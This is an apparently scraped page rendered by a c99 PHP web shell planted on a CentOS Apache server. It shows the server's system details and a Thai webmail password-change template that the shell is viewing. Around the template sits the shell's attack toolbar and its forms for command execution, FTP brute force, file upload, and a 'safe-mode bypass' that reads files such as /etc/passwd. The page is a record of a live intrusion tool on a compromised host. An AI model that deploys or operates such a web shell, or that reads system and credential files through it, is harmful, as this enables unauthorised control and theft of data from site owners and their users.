!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/info/tpl/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     chpasswd.tpl.bak.bak (6.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
    <table cellpadding="0" cellspacing="0" border="0" align="left" summary="">
    <tr>
      <td valign="top"><img src="{INFOURL}img/spacer.gif" width="2" height="220" alt=""></td>
      <td>
        <span style="font-size: 12pt; font-family: MS Sans Serif, sans-serif; font-weight: bold; color: #11387D; margin: 0px; padding: 0px;">dเปลี่ยนรหัสผ่าน</span>
        <p style="font-weight: bold; font-family: MS Sans Serif, sans-serif; color: #666666;">ขั้นตอนการเปลี่ยนรหัสผ่าน - เมื่อกรอกข้อมูลตามฟอร์มข้างล่างครบแล้วให้คลิ๊กที่ปุ่ม "ดำเนินการ" เพื่อเปลี่ยนรหัสผ่าน</p>
        <div style="height: 2px;">
          <hr style="border: 1px solid #1A6BF9">
        </div>
        <form name="chpasswd" style="margin: 0px;" method="post" action="{INFOINDEX}?__m=config&__sb=chpasswd&__mx=change" id="chpasswd" target="transparent">
          <table cellpadding="0" cellspacing="0" border="0" summary="">
            <tr>
              <td valign="top" align="right"><label style="font-weight: bold; font-family: MS Sans Serif, sans-serif; color: #666666;">ชื่อเข้าใช้ระบบ :&nbsp;</label></td>
              <td valign="top">
                <span style="font-weight: bold; font-family: MS Sans Serif, sans-serif; color: #0000FF; font-size: 10pt;">{USERLOGIN}</span>
                <div style="height: 25px; font-size: 8pt;">
                  &nbsp;
                </div>
              </td>
            </tr>
            <tr>
              <td valign="top" align="right"><label style="font-weight: bold; font-family: MS Sans Serif, sans-serif; color: #666666;">รหัสผ่านปัจจุบัน :&nbsp;</label></td>
              <td valign="top">
                <input name="CurPWD" type="password" maxlength="16" value="" style="height: 12px; color: #0000FF; width: 160px;" onkeyup="ValidPasswd(this.form, this)" onfocus="this.select()" onchange="ReValidate(this.form, this)">
                <div style="height: 25px; font-size: 8pt; color: #777777;">
                  เพื่อยืนยันว่าเป็นเจ้าของรหัสผ่าน
                </div>

              </td>
            </tr>

            <tr>
              <td valign="top" align="right"><label style="font-weight: bold; font-family: MS Sans Serif, sans-serif; color: #666666;">รหัสผ่านใหม่ :&nbsp;</label></td>
              <td valign="top">
                <input name="NewPW1" type="password" maxlength="16" value="" style="height: 12px; color: #FF0000; width: 160px;" onkeyup="ValidPasswd(this.form, this)" onfocus="this.select()" onchange="ReValidate(this.form, this)">
                <div style="height: 25px; font-size: 8pt; color: #777777;">
                  ไม่น้อยกว่า 6 ตัวอักษร ห้ามมีช่องว่าง
                </div>
              </td>
            </tr>
            <tr>
              <td valign="top" align="right"><label style="font-weight: bold; font-family: MS Sans Serif, sans-serif; color: #666666;">ยืนยันรหัสผ่านใหม่ :&nbsp;</label></td>
              <td valign="top">
                <input name="NewPW2" type="password" maxlength="16" value="" style="height: 12px; color: #FF0000; width: 160px;" onkeyup="ValidPasswd(this.form, this)" onfocus="this.select()" onchange="ReValidate(this.form, this)">&nbsp;<img id="checkePwd" src="{INFOURL}img/ok.gif" alt="" style="display: none;">
                <div style="height: 25px; font-size: 8pt; color: #777777;">
                  เพื่อยืนยันความถูกต้องรหัสผ่านใหม่
                </div>
                </td>
            </tr>
          </table>
            <div style="height: 2px;">
              <hr style="border: 1px solid #1A6BF9">
            </div>
          <div style="text-align: right">
            <nobr><input id="Continue" type="submit" name="Continue" value=" ดำเนินการ " style="font-weight: bold;" disabled="disabled">&#160;&#160;<input type="button" name="Cancel" value="   ยกเลิก  " style="font-weight: bold;" onclick="window.location.replace('{INFOURL}infosys.php?__m=config')"></nobr>
          </div>
        </form>
        <table cellpadding="0" cellspacing="0" border="0" width="618" style="font-size:0;">
          <tr>
            <td>&#160;</td>
          </tr>
        </table>
      </td>
      <td valign="top"><span style="font-size:0;">&#160;</span></td>
    </tr>
    </table>
    <script type="text/javascript" language="JavaScript">
    function ReValidate (el, elc)
    {
        if (!ValidPasswd.active)
            ValidPasswd (el, elc);
        ValidPasswd.active = false;
    }
    function ValidPasswd (el, elc)
    {
        ValidPasswd.active = true;
        if (/\s/.test(elc.value)) {
            alert("รหัสผ่านต้องยาวไม่น้อยกว่า 6 ตัวอักษร และห้ามมีช่องว่าง  ");
            ValidPasswd.alerted = true;
        }
        ViewCheckImage(el, elc);
    }
    function ViewCheckImage (el, elc)
    {
        if (el && elc) {
            var imgId = document.getElementById("checkePwd");
            var SmtId = document.getElementById("Continue");
            if (imgId && SmtId) {
                var Trimed1 = trim(el.NewPW1.value);
                var Trimed2 = trim(el.NewPW2.value);
                if (Trimed1 == Trimed2 && Trimed1 != "" && Trimed1.length >= 6) {
                    if (trim(el.CurPWD.value) == "" || /\s/.test(el.CurPWD.value)) {
                        imgId.style.display = "none";
                        SmtId.disabled = true;
                        if (!ValidPasswd.alerted)
                            alert("กรุณาใส่รหัสผ่านเดิมก่อน และห้ามมีช่องว่าง  ");
                        el.CurPWD.focus();
                    } else if (/\s/.test(elc.value)) {
                        imgId.style.display = "none";
                        SmtId.disabled = true;
                        elc.focus();
                    } else {
                        imgId.style.display = "";
                        SmtId.disabled = false;
                    }
                } else {
                    imgId.style.display = "none";
                    SmtId.disabled = true;
                }
                ValidPasswd.alerted = false;
            }
        }
    }
    function ResetCurPWD ( )
    {
        var imgId = document.getElementById("checkePwd");
        var SmtId = document.getElementById("Continue");
        if (imgId && SmtId) {
            imgId.style.display = "none";
            SmtId.disabled = true;
            chpasswd.CurPWD.focus();
        }
    }
    </script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0192 ]--